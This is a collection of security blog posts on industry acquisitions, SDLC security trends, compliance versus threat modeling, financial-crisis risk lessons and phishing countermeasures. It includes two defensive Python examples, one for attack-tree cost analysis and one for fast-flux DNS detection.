More recently, in 2009, Trusteer, a security company providing anti-malware solutions, published an advisory entitled "Measuring the in-the-wild effectiveness of Antivirus against Zeus", according to which the most popular banker malware, Zeus, is successfully bypassing up-to-date antivirus software: "The effectiveness of an up to date anti virus against Zeus is thus not 100%, not 90%, not even 50% - it's just 23%".

It is therefore clear, in my opinion, that the defenses against malware infection, whether by viruses, trojans or worms, have to be expanded to include other layers of the technology stack that are now the target of rootkits and malware attacks. Besides the O.S. and the application, these expanded layers might include, for example, the hardware, kernel and firmware that are currently below the radar of AV detection tools.
Expanding security protection to the hardware layer is beneficial not only as a detection control, such as for malware intrusion detection, but also as a preventive security control, such as for data protection. In the case of cybercrime, malware rootkits such as ZeuS, for example, seek to compromise the communication channel between the PC and the banking sites: the malware attacks the client to either hook into the kernel to perform Man In The Middle (MiTM) attacks or into the browser APIs to perform Man in The Browser (MiTB) attacks. In both cases there is a lot of security to gain at the application layer by protecting the data at the hardware layer. One way to defeat MiTM attacks, for example, is to secure the communication channel through 2-way mutual authentication and PKI using client identities that are protected by so-called "ID vaults" embedded in hardware chips and secured at the firmware layer. An example of these "ID vaults" is the Broadcom USH Unified Security Hub, which is included in several PCs today and is leveraged by data protection tools such as Verdasys's Digital Guardian data protection solution. You might also consider the benefit of developing applications with hardware defenses, such as enforcing firmware controls by digitally signing your application at the firmware layer. For those of you that attended Barnaby Jack's talk about jackpotting ATMs at BlackHat this year, signing the application at the firmware layer was one of the mitigations recommended against rootkit infections.

The other big opportunity for security companies is the integration of software security with hardware, such as in the case of applications for mobile phones. As software is built for a specific mobile O.S. (e.g. Android or iPhone O.S.), it can also be built out of the box to leverage security controls deep in the technology stack, including kernel APIs, firmware and hardware. When attack vectors can be detected, intrusion detection events triggered at the different layers of the technology stack can drive defenses at the application layer, such as blocking the application from running or from transferring data to the server. These are just a few examples of security synergies across layers of the technology stack.

In summary, I think Intel's acquisition of McAfee could give Intel the opportunity to design hardware chips that tightly integrate security detection and prevention controls with firmware and software and provide additional layers of security to applications.

The other industry M&A news was the acquisition of the software security company Fortify by HP: this follows a trend of big software companies such as IBM and HP acquiring security tool companies such as Watchfire and Fortify. Previously, HP grew its security assessment suite of tools through the acquisition of SPI Dynamics' WebInspect, integrating it into HP's software quality assurance suite of tools, QA Inspect. Since IBM previously acquired the application scanning tool vendor Watchfire (AppScan) and the static analysis tool provider Ounce Labs, the acquisition of Fortify's static analysis tool by HP fits the scenario of HP competing head to head with IBM in the software security space. For the sake of competition, the acquisition of Fortify by HP makes a lot of sense, but it also fits the industry trend of running software security either as a service or as an assessment integrated into the Software Development Life Cycle (SDLC) process.

For example, application and source code vulnerability scanning assessments, referred to as dynamic and static testing, can be performed as Software Security as a Service (SSaaS) for software development stakeholders such as application architects, developers and testers. These services can also include automated security tools that can be rolled out as part of the overall software development and testing suite of tools, such as Integrated Development Environments (IDE) and Q/A testing tools. Obviously, security tool integration with IDE and Q/A testing tools is just one part of the software security equation, as besides tools you also need to roll out secure coding training and secure coding standards. The holistic nature of software security, which includes people, process and technology, is often misunderstood by those who have to manage software security initiatives for organizations, as software security tools or services alone are misinterpreted as sufficient to produce secure software.

To produce secure software with a level of software security assurance that is both risk-mitigating and cost-effective, organizations need to roll out, besides static and dynamic analysis tools and services, software security training for developers and software security engineering processes/methodologies such as SAMM, BSIMM, MS-SDL-Agile, Securosis SSDL and OWASP CLASP.

Obviously, the increased adoption of static and dynamic analysis tools by the enterprise follows the application and software security tool adoption trend. If you refer to the Errata Security survey "Integrating Security Into the SDLC" (http://www.erratasec.com/ErrataSurveyResults.pdf), it shows, for example, that static analysis is the most popular activity (57%), followed by manual secure code reviews (51%) and manual testing (47%). The adoption of application and software security tools usually follows the enterprise's awareness of the application security problem as a software security problem. At the beginning of rolling out an application security initiative, companies start from the far right of the SDLC by rolling out application scanning tools and ethical hacking web assessments, and then move toward the left of the SDLC with source code analysis. Eventually the awareness of the software security problem moves to the design stage, by trying to identify security design flaws earlier in the SDLC with Application Threat Modeling (ATM). Right now, according to the Errata Security survey, only 37% of organizations have adopted ATM as part of the SDLC. I believe the trend will lead in the direction of adopting ATM because of the efficiencies and the larger security coverage that ATM provides. This low ATM adoption can probably be explained by insufficient awareness of the benefits of ATM, as well as by the maturity levels needed to seek adoption of ATM within the SDLC.

Software security training for developers is also a trend: 86% of the survey participants sent one or more members of the software development team to security training. But again, according to the Errata Security survey, software security is not yet on the top list of information security management concerns, as only about 1/6 of participants (16%) send their project managers and InfoSec and AppSec directors to software security process management training.
As the adoption of static and dynamic security testing grows in the industry there will also be a need for software security services such as software security training and the development of engineering processes and standards. This trend follows the integration of the organization's SDLCs, as well as of its InfoSec/AppSec and risk management processes, with formal software assurance methodologies and activities such as vulnerability assessments, secure code reviews and secure design review/application threat modeling.
These trends in the M&A of the software security industry will also create new career opportunities. In the case of information security managers, for example, there will be a need to hire managers with the right experience and skills in managing software security processes for organizations. In the case of software engineers and security consultants, it will create a need for software engineers and consultants abreast of software security formal methods, static and dynamic analysis tools, and security assessments such as secure code reviews and application architecture risk analysis and design or application threat modeling. In the case of electrical, software or computer system engineers, the knowledge of hardware and software security could also be leveraged to become an expert in hardware-software security integration, such as in the design of hardware-embedded application security products/solutions.

In conclusion, as a software security practitioner, in your current professional role of information security manager, software security architect, software security consultant or software security trainer/instructor, you might look at these industry trends to set your career goals and cultivate the necessary skills and experience that could lead you to the new career opportunities being created as a result of these security industry trends.

Looking past the cyber threats of the last decade and the new to come

Top Cyber Security Risks
As we pass the first decade after 2000 we can look back at how IS threats have evolved in the last ten years, both in the complexity of the attacks and in the evolution of the attackers' motives.
This is well described by Robert Vamosi in his PC World article "Top 10 Security Nightmares of the Decade". The new threats that we will be facing in 2010, according to predictions from a McAfee Avert Labs report, will be the exploitation of application layer vulnerabilities such as Web 2.0 and social networking sites, drive-by downloads, browser vulnerabilities, man-in-the-browser, Adobe Flash vulnerabilities, mobile phone vulnerabilities, and malware attacks through botnets and banking trojans (e.g. Zeus).

For security practitioners that still think old-school network security, such as securing the perimeter by deploying firewalls and IDS (which I pioneered developing at ISS) and mitigating threats to the PC/desktop using AV and AS, this is the main lesson from the trenches: as threats evolve, and rather quickly, with increased sophistication, we need new defenses, especially at the application layer, to mitigate these new threats. The new defenses need to look above all at the security of the applications and the data, especially of the transactions and the data flows (end to end from user to application).

There is also a need to look at security controls from a risk mitigation perspective: keep measures that work (that is, mitigate risk to an acceptable residual risk) and discard the ones that do not work. One example of a very destructive change in the security industry would be to retire all the MFA (Multi Factor Authentication) measures that were adopted in 2006 (mostly to earn a checkmark from FFIEC) and that now just add to the TCO (Total Cost of Ownership), since they can be easily defeated by malware.

As Einstein said, "let's not pretend that things will change if we keep doing the same things". In essence, we are moving to a post-information age society where the mitigation of cybercrime threats needs to be the main focus of information security. I believe that we as security practitioners are about to reach a tipping point: organizations and governments will pay a huge price for fraud and data losses unless they deploy radically new countermeasures.

My wish for 2010 is that business organizations and governments will put more focus on application security and on the root causes of vulnerabilities such as insecure software and design. I hope we can put the effort into building new countermeasures at the application layer and use new approaches such as the identification of design flaws, which account for more than 50% of vulnerabilities, by using threat modeling (that will be the book I will publish in 2010). My hope is that we recognize that we as security practitioners are in a race against time to win against cybercriminals; we need to work with businesses to roll out new security controls and measures. We need to quickly adapt to the new threats and prepare to respond to the cyber threats of the next decade...

Cybercrime risk mitigation: a critical view of compliance from threat analysis perspective
I recently had the opportunity to give presentations for OWASP in Los Angeles and Orange County together with the Application Threat Modeling book co-author, Tony Ucedavelez. Both Tony and I believe that application threat modeling can help organizations understand cyber-threats and identify countermeasures to mitigate them proactively. We also think that compliance with security standards is no guarantee of "immunity" from becoming a target and victim of cybercrime and fraud, hence the intentionally provocative topic of our presentation: "The rise of threat analysis and the fall of compliance in mitigating cyber-crime risks". We take a critical view of compliance, especially PCI-DSS, and we advocate putting compliance in the perspective of business risk mitigation. To support our view, we start by looking at how the PCI-DSS security standard drives application security through compliance, to highlight the fact that the two largest data breaches of credit card data ever reported occurred at companies that were compliant with the PCI-DSS security standard. We also analyze these data breaches for the business impact they caused and we compare the cost of not being compliant with the cost of the business impact caused by the breach: based upon publicly disclosed data (2007 TJX data breach) we find that overall the cost of non-compliance is one order of magnitude smaller than what it costs an organization to cover the overall business impact of the data breach incident (e.g. millions for non-compliance compared with billions for business impact).

There is a strong and compelling case, based upon vulnerability data alone, that compliance does not buy security for your organization but only a minimum level of information security assurance: in the context of mitigating vulnerabilities for compliance's sake, for example to fill a compliance requirement (e.g. vulnerability assessment), based upon the data from MITRE, at best the organization will mitigate 45% of all known vulnerabilities (e.g. the 600 included in the MITRE CWE study).

We use this data to advocate that the remaining 55% of ways to exploit known issues can be assessed by adopting threat analysis and risk mitigation techniques that cover a larger attack space than compliance security assessments. These threat analysis techniques include, for example, (1) gathering cyber-intelligence about attacks from public sources such as law enforcement (e.g. FBI, Secret Service), (2) learning about attack scenarios and likely targets with attack tree analysis, (3) determining the possible abuses of the application's business logic using use and abuse cases, (4) identifying the attack vectors used against web sites so that application defenses can be tested and (5) finally, developing countermeasures at the application layer with threat modeling/architecture risk analysis.

The threat mitigation mantras are: (1) you can only mitigate the threats you know of; (2) know your enemy so you can build your defenses. Being threat aware means being threat intelligent. Knowing your enemy means proactive risk awareness: as organizations defending against cyber-attacks we need to be aware that cyber-criminals already assume you have been compliant with PCI-DSS to mitigate known vulnerabilities, such as to protect credit card data.

Fraudsters also know that organizations have implemented multi-factor authentication and fraud detection, in compliance with the FFIEC guidelines for authentication.

We basically need to be aware of the new, bigger cybercrime threat and how it might affect us. For example, cyber criminals can buy or lease sophisticated automated attack tools called botnets to commit fraud. These botnets can direct attacks against banking customers by exploiting browser vulnerabilities, as well as against on-line banking sites, bypassing strong authentication and data filtering controls. Cyber-crimes include fraud (e.g. wire transfers to money mule accounts) as well as stealing credit card and confidential data to resell it in the underground economy or to fake credit and debit cards.


Understanding how these threat scenarios might affect your organization in terms of threat analysis means asking: (1) is my organization possibly a target? (2) what is the data asset that an attacker/fraudster will most likely go after? (3) what attack vectors will he use? (4) what are the potential vulnerabilities that can be exploited, and where? (5) which countermeasures can I design and deploy at the application layer?

Threat analysis of security controls must be the driver for the design of countermeasures:

To test defensive controls at the application layer, we need to identify the attack vectors (both manual and automated) and use them against the authenticated and non-authenticated entry points of our application, validate the authorization levels required and walk through the data flows (from client to back end) to test for potential vulnerabilities. The aim of this data flow threat analysis is to localize and identify the countermeasures that can be designed and deployed at each layer and component of the architecture (client, server processes and data).

We emphasize that for security compliance to be effective for security, it needs to enforce actionable threat assessments. We advocate a new risk mitigation strategy that looks at compliance with a positive security approach rather than a negative security approach. The positive security approach consists of proving the positive effect of defenses in mitigating threats; the negative security approach consists of proving the gaps in applying standards and security controls. Positive security is driven by threat analysis as a positive factor for building better security controls against new threats; negative security is driven by compliance as a way to prove the negative, that is, that your organization failed in applying standards and policies.

We conclude that even if there is still value in compliance for security as validation against a minimum level of security requirements, the approach that most organizations take toward compliance does not help security and derails the organization's effort from focusing on effective threat risk mitigation. To improve security, organizations need to reconsider compliance; being compliant will not warrant protection of your core business assets against cyber-crime threats. Compliance is just one piece of the risk mitigation strategy; compliance security assessments can be effective mitigation against cyber-crime threats only when they are driven by cyber-crime intelligence and application threat modeling techniques.

An abstract of the presentation is included herein: On August 5, 2009, Federal prosecutors charged Albert Gonzalez with the largest case of credit and debit card data theft that ever occurred in the United States: 130 million credit card numbers, by hacking into Heartland Payment Systems, Hannaford Brothers, 7-Eleven and two unnamed national retailers. Both Heartland and Hannaford were compliant with the PCI-DSS security standard at the time they were compromised: that calls into question the validity of regulatory compliance frameworks, and specifically compliance with PCI-DSS standards, as an effective method to reduce data breaches, identity theft and the proliferation of credit card fraud. This presentation will further analyze the cost of the data breaches by monetizing the losses as reported in quarterly earnings reports (e.g. TJX) as well as the impact on stock price (e.g. HPY) at the time of public disclosure of these data breaches. Monetizing data breaches helps to frame non-compliance risks as a factor of business impact and further dispels the myth that being compliant equals being secure.


Traditional compliance-driven security assessment efforts such as penetration testing, static code analysis and standard compliance gap analysis will be compared to threat analysis techniques in order to demonstrate how cybercrime risks can be mitigated by understanding threat scenarios through cyber-intelligence: cases of reported cybercrime attacks will be presented as a way to determine the threat landscape and the attack scenarios. Attacker motives and the means to achieve them will be analyzed using attack tree analysis: attack trees allow the study of cyber attacks against web applications, breaches of credit card data as well as ATM fraud. Use and misuse cases will be used to evaluate the strength of security controls such as multi-factor authentication against known cyber-attacks such as MiTM, as well as a way to elicit requirements for security controls (e.g. secure logins). Examples of attack vectors for testing applications against code injection attacks as well as cybercrime attacks (e.g. HTML-IFRAME injection attack vectors and drive-by download) will be provided using attack vector analysis. Data Flow Diagram (DFD) analysis and Architecture Risk Analysis examples will be presented to provide a viable, consistent methodology to identify the entry points for attack vectors, identify user access levels, and enumerate threats, attacks, vulnerabilities and countermeasures. Security by deployment and security by design principles will be elaborated as strategic countermeasures with reference to three-tier architectures and security by design architecture principles. Finally, risk mitigation strategies against cybercrime attacks will be discussed, starting with self-awareness questions.
The presentation re-affirms that compliance risks need to be approached by organizations as a factor of business risk, and advocates threat risk modeling and application threat modeling as actionable processes for mitigating cybercrime risks to web applications.
By using threat tree analysis, for example, it is possible to analyze the effectiveness of security controls such as MFA in mitigating threats such as man-in-the-middle attacks, and to find out that most of them are ineffective. By identifying the targets of attacks with attack trees we also find that browser vulnerabilities facilitate drive-by download, man-in-the-middle and man-in-the-browser attacks, and that these vulnerabilities represent the weakest security link. Only after cyber-crime targets are analyzed and visualized with attack trees is it possible to understand the different avenues of attack used by the fraudsters. By associating a cost with achieving each step of the attack tree it is possible to walk through the attack methods that cost the attacker the least to succeed.
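To make the cost walk-through concrete, here is an added example (not from the presentation or the book) that evaluates a small attack tree: OR nodes take the cheapest child, AND nodes sum their children, and a countermeasure is modelled as added cost on one leaf, so you can see which control moves the attacker's cheapest path the most. The tree, its labels and the costs are constructed illustrations built from the threat categories named above, not measured data.

```python
"""Minimum-cost path analysis over an attack tree.

Added example, not code from the post. Leaves carry a constructed
attacker-cost estimate; OR nodes cost the cheapest child, AND nodes the
sum of their children. A countermeasure is modelled as extra cost on
the leaf it hardens, and candidate countermeasures are ranked by how
much they raise the cheapest path to the root.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Node:
    label: str
    kind: str = "LEAF"            # "LEAF", "OR" or "AND"
    cost: float = 0.0             # only meaningful for leaves
    children: List["Node"] = field(default_factory=list)


def cheapest(node: Node) -> Tuple[float, List[str]]:
    """Return (cost, leaf labels) of the cheapest way to achieve node."""
    if node.kind == "LEAF":
        return node.cost, [node.label]
    if node.kind == "OR":
        # attacker picks the least expensive branch
        return min((cheapest(c) for c in node.children), key=lambda r: r[0])
    if node.kind == "AND":
        # every child must be achieved, so costs add up
        total, steps = 0.0, []
        for c in node.children:
            cost, path = cheapest(c)
            total += cost
            steps.extend(path)
        return total, steps
    raise ValueError(f"unknown node kind {node.kind!r}")


def with_countermeasure(node: Node, leaf_label: str, added_cost: float) -> Node:
    """Copy of the tree in which one leaf is made costlier by a countermeasure."""
    if node.kind == "LEAF":
        extra = added_cost if node.label == leaf_label else 0.0
        return Node(node.label, "LEAF", node.cost + extra)
    return Node(node.label, node.kind,
                children=[with_countermeasure(c, leaf_label, added_cost)
                          for c in node.children])


def rank_countermeasures(root: Node, options: Dict[str, float]) -> List[Tuple[str, float]]:
    """For each {leaf: added cost} option, the new cheapest-path cost, best first."""
    ranked = [(leaf, cheapest(with_countermeasure(root, leaf, add))[0])
              for leaf, add in options.items()]
    return sorted(ranked, key=lambda r: -r[1])


def sample_tree() -> Node:
    # Constructed illustrative tree; costs are arbitrary relative units.
    return Node("Bypass MFA on online banking login", "OR", children=[
        Node("Man-in-the-middle", "AND", children=[
            Node("Intercept the network session", cost=4),
            Node("Relay credentials and one-time code in real time", cost=3)]),
        Node("Man-in-the-browser", "AND", children=[
            Node("Drive-by download infection", cost=2),
            Node("Hook browser APIs", cost=2)]),
        Node("Phish credentials and one-time code", cost=6),
    ])


if __name__ == "__main__":
    tree = sample_tree()
    cost, steps = cheapest(tree)
    print(f"cheapest path costs {cost}: {' -> '.join(steps)}")
    options = {"Drive-by download infection": 5,
               "Phish credentials and one-time code": 5}
    for leaf, new_cost in rank_countermeasures(tree, options):
        print(f"harden '{leaf}': cheapest path becomes {new_cost}")
```

Raising the cost of one leaf only shifts the attacker to the next-cheapest branch, which is the "weakest link" point made above.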
Financial Markets Meltdown: Risk Management Lessons
Example of an act of God: lightning
I just finished reading the book "Against The Gods: The Remarkable Story Of Risk" by Peter L. Bernstein. This is part of my current study of financial risks and their relationship with information security risks. The book is written by an economist, Peter Bernstein, and provides, in my opinion, very good insight into how risk analysis evolved as a discipline to respond to human needs. Along the course of history, risk management has evolved as a discipline to help humans calculate risks for decision making in different aspects of the human condition, such as national and individual wealth, human health, engineering, warfare etc.

As a technical discipline, risk management also evolved as part of the progress made by mathematicians in predicting risk. Most of us now associate the likelihood factor of risk with the calculation of a probability, such as the likelihood that the occurrence of significant events might have an impact on our human lives. Risk analysis had a shift in the course of human history with the mathematical discovery of probability theory, which originated back in the 1600s, thanks mostly to the works of mathematical geniuses such as Pascal and Fermat. These mathematicians were the first to devise a mathematical method to forecast the outcome of Pacioli's puzzle game. From a way to predict the outcomes of games and help gamblers, probability theory evolved in the 1700s to respond to business needs, such as helping the English government predict life expectancies so it could help its finances with the sale of life annuities. This event marked the start of the insurance business. Later Bernoulli and Leibniz invented methods of statistical sampling that are used today in scientific methods for assessing quality, the health of populations, demographic and political studies, etc. We had the discovery of the normal distribution that is used for statistical analysis: events could be predicted as the number of observations in the sample increased. In the 1800s we had chaos theory and the discovery of critical concepts in statistical analysis such as "regression to the mean", which explains that events are affected by a random variance so that a market can be expected to fall after going up and vice versa. In the 1900s financial risk theories also demonstrated mathematically that putting all eggs in one basket is an unacceptable risk strategy for buying stocks.

Human factors are the fundamental risk "element"
In modern times, risk models got help from information technology and computerized risk modeling. These risk models are used to predict financial trends and support decision making. Nevertheless these models also fail. Since risk calculation is a complex, multi-variable and non-linear problem to solve, the accuracy of these models is always in question. For example, these computerized models clearly failed to predict the house mortgage risks and the impact on the financial markets. In my opinion this is because risk in essence ties fundamentally to the human element and irrational decision making. It also ties to unpredictable events that we did not include in the analysis of the mathematical model. At the root of the meaning of risk we have "to dare": as Bernstein points out, the word risk originates (sounds like I am paraphrasing the movie My Big Fat Greek Wedding :) from the Italian "risicare", which means to act, to dare. There is actually a saying for it, a proverb for those who know the Italian language, "chi risica non rosica": it means who does not risk does not gain...

The point I want to make here is that human factors determine how we react to risk. From this perspective, learning about human history as a factor in making risk decisions is the key to effective risk management.

One interesting lesson that can be learned is that the "attitude" or "appetite" for risk was obviously not calculated and led the financial markets to the current meltdown. During the so-called "housing price bubble" era of the last 5-7 years we had people buying houses by borrowing money with mortgages that were at high risk of not being repaid. The home buyers and the financial institutions allowed this party to happen: home owners happy to own houses that, according to risk, they should not have been able to afford, and the financial institutions taking high risks for pure financial gain, along with speculators inflating home values by buying and selling property for their quick profit.

Then things started to change for the worse. Rumors spread that some banks were running out of cash and that big institutional investors had pulled out of the market. Acting upon these "rumors", investors started selling financial stocks, despite the CEOs of those financial institutions still trying to reassure them. The rumors eventually became reality: the big investors pulled out of the market and all of a sudden the financial institutions needed to raise capital to stay afloat. As a last resort the government stepped in to contain the impact on the overall economic system.

Co-risk for financial institutions
One lesson that you can learn is that this is a case of systemic risk. Systemic risks are the most dangerous risks because they scale up across different, interconnected entities and might end up impacting the whole financial system. For example, the US financial meltdown started with the failure of financial institutions that depended on each other because they shared the risk: from Bear Stearns to Lehman Brothers, from Merrill Lynch to AIG and then to Bank of America and Citigroup. Most recently, the US Government acted to contain the systemic risk with extraordinary and very timely measures, bailing out financial institutions with enormous amounts of money.

From the perspective of information security we might also have similar systemic risks. An example of systemic risk is the impact if a critical information system, such as one that serves as the backbone of all infrastructure and operations, one day fails. This could be, for example, an attack to bring down the Internet, such as a denial of service attack against the DNS root servers. Another example of systemic risk is the one posed by botnet-driven distributed denial of service attacks against financial transaction systems and the financial infrastructure. Attacks that potentially pose a systemic risk to the information infrastructure of a country or a company need to be taken very seriously and analyzed using attack trees and threat modeling.

Credit Default Swap (source: Invest2success blog)
Another lesson that you can learn from the financial market meltdown concerns the gaps in the laws and regulations that control risk. Take for example the unregulated Credit Default Swaps used by banks to make millions of dollars with a form of insurance based on spreading the risk. A CDS meant that you could buy insurance on a bond that you owned: as long as the bond did not go "belly up" you just paid the insurance installments, and the seller of the protection only had to pay out the whole amount of the bond if the bond defaulted. This is basically an instrument for risk transfer and risk avoidance, and it also contributed to increasing the systemic risk.

The analogy in information security would be that while your operations expand to new data centers, and the value of the data assets you manage grows, you do not step up the security controls by investing in security technology, processes and people. You might also decide to transfer the risk to another entity and have your services managed by them. In some cases a certification from auditors still lacks clear oversight of the security risks you are facing.

Once you face the impacts of systemic risk you need to act with extraordinary measures to contain the risk, and it still takes a lot of time to recover to normal.

Another lesson you can learn from the human attitude toward risk is that there is always a Cassandra: someone who prophetically made a negative risk assessment while the common thinking was positive, as Cassandra told the people of Troy to watch out for the Trojan Horse, but nobody paid any attention. As humans we doubt "doomers", especially when everybody else is partying.

Unfortunately, one of the greatest lessons from the study of human perception of risk is that humans do not usually make decisions based on the mistakes of previous generations. For this reason, risk education is fundamental. Risk managers have to learn the human sciences and understand the human attitude toward risk, the perception of events, which risk indicators are critical and which facts are relevant.

From the perspective of computational models, we should have expected this financial meltdown to happen sooner or later, because a 10-20% drop in home prices and other factors could have been built into the model. Besides, some indicators of systemic risk such as CDSs could have issued a warning from a risk-distribution and business-impact perspective: the inter-dependency of financial institutions and their reliance on risk transfer through unregulated transactions should have raised some economists' eyebrows. Did the risk models factor in these elements? These questions are still open in my mind.


December 1941, Japanese attack on the US Navy at Pearl Harbor: a small boat rescues a seaman from the 31,800 ton USS West Virginia burning in the foreground.

From the information security perspective, we do not have such sophisticated risk models; rather, risk assessment is still mostly done as a qualitative assessment by risk analysts who understand the business impact of system vulnerabilities. Nevertheless, the equivalent of a meltdown of the Internet cannot be excluded. Some refer to this threat as a "digital Pearl Harbor", after the Japanese attack on Pearl Harbor in WWII. We have recently had incidents that seem to indicate that such attacks might be possible in the future. We had, for example, a distributed denial of service attack against the information infrastructure of an entire country, Estonia, allegedly caused by the Russian Business Network. It has been demonstrated that cyber attacks against the SCADA systems of the power grid are possible, as are distributed denial of service attacks via botnets directed toward financial institutions. Recent examples include coordinated attacks on ATMs with cloned cards causing RBS $9 million of fraud in one day. The recent credit card information leak (the Heartland data breach) involves credit card account information for 100 million users and 500+ institutions.

These kinds of systemic attacks require governments and financial institutions to work together to build defenses that prevent potential large-scale information systemic risks. There is a need for threat analysis of cybercrime attacks and a reconsideration of what is system-critical and what is acceptable risk. Risk mitigation provisions need to be a topic of research, and new information security technologies need to be developed to mitigate these kinds of attacks. Information security managers need to learn the lessons that the financial meltdown taught the financial markets, how it could have been predicted, and find the analogies with information risks, so that a similar systemic risk to the information infrastructure can be prevented.

New phishing attacks require adoption of different countermeasures
Phishing warning (source: Cyberpunk blog)
Back in the early 2000s, phishing attacks required fraudsters to clone a web site, register it on a similar domain and social engineer a victim with a phishing mail. Then phishers got smarter: instead of cloning the site with CGI and doing all this work, why not use a web proxy and mount a man-in-the-middle attack? Besides, this is also a good way to break multi-factor authentication controls. This was back in 2006. Since then, most banks and financial institutions in the US have deployed strong authentication, partly to mitigate phishing and partly in response to the FFIEC guidance on authentication. Phishing attacks have since evolved to exploit man-in-the-browser vulnerabilities, to inject code that is executed by the browser and to exploit XSS vulnerabilities in web sites. In the last few years phishing has resorted to botnets to be even more effective, such as MPack, Storm, Asprox and RockPhish, just to mention the more popular ones. These are the tools of the cybercrime economy, built to be used by professional fraudsters to make millions of dollars, not by script kiddies looking for fame. The cost of such botnets is in the thousands of dollars, and their sale generates a business of millions of dollars for the underground economy. The sophistication of these botnets is that they can be very stealthy to an IDS and difficult to tear down by IP address because of fast-flux techniques: round-robin DNS with a short TTL, constantly changing the IPs mapped to a domain. More information on fast flux and how it is used in botnets such as Asprox can be found here. Spear (targeted) phishing is currently aimed at banks: the kits are very close to the original site and use RockPhish as the botnet. This threat is real and requires new countermeasures. First of all it means raising the bar and reducing the attack surface. For example, consider more security for the users of your web site: require them to use locked-down browsers with anti-phishing plug-ins enabled and with extended validation certificate support.
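The fast-flux behaviour described above (a domain whose A records rotate constantly under a short TTL) is something a defender can spot from the resolver side. The following is an added example, not code from the original post: it scores successive DNS answers for a hostname on TTL, number of distinct IPs, /24 diversity and answer churn. The lookup histories, the hostnames and the thresholds are constructed for this illustration; a production detector would also enrich the IPs with ASN data and tune the thresholds against CDN traffic, which rotates addresses too but usually within a few blocks it owns and with longer TTLs.

```python
"""Fast-flux heuristic over successive DNS answers for one hostname.

Added example, not code from the original post. Each history entry is
(seconds since first lookup, TTL, A records) as a resolver would observe
them. Thresholds are assumptions chosen for this illustration.
"""
import ipaddress

# Constructed lookup histories (RFC 5737 documentation addresses), not real observations.
SNAPSHOTS = {
    # suspect: every answer is a fresh set of IPs from unrelated blocks, TTL 300s
    "login-update.example": [
        (0,   300, ["198.51.100.12", "203.0.113.9",   "192.0.2.77"]),
        (300, 300, ["203.0.113.45",  "192.0.2.130",   "198.51.100.200"]),
        (600, 300, ["192.0.2.5",     "203.0.113.201", "198.51.100.33"]),
        (900, 300, ["198.51.100.88", "192.0.2.250",   "203.0.113.120"]),
    ],
    # benign: a small pool rotating inside one netblock, TTL one hour
    "static.cdn.example": [
        (0,    3600, ["198.51.100.12", "198.51.100.13"]),
        (3600, 3600, ["198.51.100.12", "198.51.100.14"]),
        (7200, 3600, ["198.51.100.13", "198.51.100.14"]),
    ],
}


def flux_features(lookups):
    """Summarise a lookup history into the features a fast-flux rule keys on."""
    all_ips = [ip for _, _, answer in lookups for ip in answer]
    distinct = set(all_ips)
    # /24 diversity: flux nodes are compromised home machines spread over
    # unrelated networks; a CDN usually answers from a few blocks it owns
    prefixes = {ipaddress.ip_network(ip + "/24", strict=False) for ip in distinct}
    min_ttl = min(ttl for _, ttl, _ in lookups)
    # churn: share of each answer that was absent from the previous answer
    churn = [
        len(set(cur[2]) - set(prev[2])) / len(cur[2])
        for prev, cur in zip(lookups, lookups[1:])
    ]
    return {
        "distinct_ips": len(distinct),
        "distinct_prefixes": len(prefixes),
        "min_ttl": min_ttl,
        "avg_churn": sum(churn) / len(churn) if churn else 0.0,
    }


def is_fast_flux(features, ttl_max=600, min_ips=8, min_prefixes=3, min_churn=0.5):
    """All four conditions must hold. The thresholds are assumed for this example."""
    return (
        features["min_ttl"] <= ttl_max
        and features["distinct_ips"] >= min_ips
        and features["distinct_prefixes"] >= min_prefixes
        and features["avg_churn"] >= min_churn
    )


def classify(snapshots):
    """Map each hostname to True (fast-flux suspect) or False."""
    return {name: is_fast_flux(flux_features(lookups)) for name, lookups in snapshots.items()}


if __name__ == "__main__":
    for name, lookups in SNAPSHOTS.items():
        f = flux_features(lookups)
        print(name, f, "FAST-FLUX" if is_fast_flux(f) else "ok")
```

The point of keeping the conditions conjunctive is that any single feature is also exhibited by legitimate infrastructure (short TTLs by load balancers, many IPs by CDNs); it is the combination of short TTL, many IPs, many unrelated networks and near-total churn between answers that separates a flux network from them.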
A sandboxed browser such as the ones provided by Trusteer and Authentium could mitigate the risk of malware and keyloggers being downloaded into the client browser when your customers become victims of botnet attacks. On the application side, increase the defenses by using strong authentication and out-of-band delivery of tokens to mitigate MiTM attacks: for example, one-time passwords and tokens delivered entirely via SMS or other channels. Note that a one-time password by itself does not stop a real-time proxy that simply relays the code as the victim types it; binding the out-of-band token to the transaction details (amount, destination account) is what makes the second channel effective against MiTM. As a bare minimum, you need to mitigate the web application vulnerabilities that can be exploited to attack the browser in a phishing attack, such as the OWASP Top 10. In particular, XSS and XFS (cross-frame scripting) vulnerabilities can be exploited in phishing to deliver the attack vectors for malware and spyware. Session management flaws such as CSRF (session riding) can also be used for phishing. Often, your site might have design flaws exploitable by targeted attacks that abuse information disclosure, authorization and authentication vulnerabilities. For example, an attacker can try to harvest or enumerate user credentials, bank account and credit card information to commit fraud via different channels. When you become a victim of botnet attacks, your capability to profile the attacks and alert on the intrusions is critical for risk mitigation: an IDS that is built into the web application, such as OWASP ESAPI, or into the web server, such as a WAF (Web Application Firewall), can log and monitor suspicious activity and trigger alerts for potential fraud attempts. Using honeypots to learn about botnet attacks can be very useful, as well as to learn how to build in defenses. Threat analysis and modeling is the key to mitigation: attack trees can be used to identify the possible attack scenarios, the channels being used and the vulnerabilities that can be exploited.
Take the attack tree as the reference to derive the right countermeasures for the most likely attack scenarios, that is, the ones a fraudster will use because they are the path of least resistance and effort. For example, consider that credit card and account data can be purchased from cybercriminal organizations selling their services online. If such an attack is cheaper than breaking authentication, that is probably the one a fraudster will go for first. If your site has easily exploitable information disclosure vulnerabilities, the fraudster will probably attack your site first instead. The most important criterion: never assume that the adoption of an anti-phishing security technology will solve your problem. You need to consider the different mitigations wisely and a defense-in-depth strategy. Be proactive: when you rely on law enforcement to drive the countermeasures it is a little too late, and this can be very painful in terms of financial losses. Before your site becomes a victim of fraud with phishing 2.0, do a thoughtful review of the potential threat scenarios for all your service delivery channels, for example web, ATMs, IVRs and any other delivery channel you might have. You need to consider these channels as the attack surface available to a fraudster, simulate potential botnet-based/phishing attack scenarios and validate the effectiveness of the countermeasures.
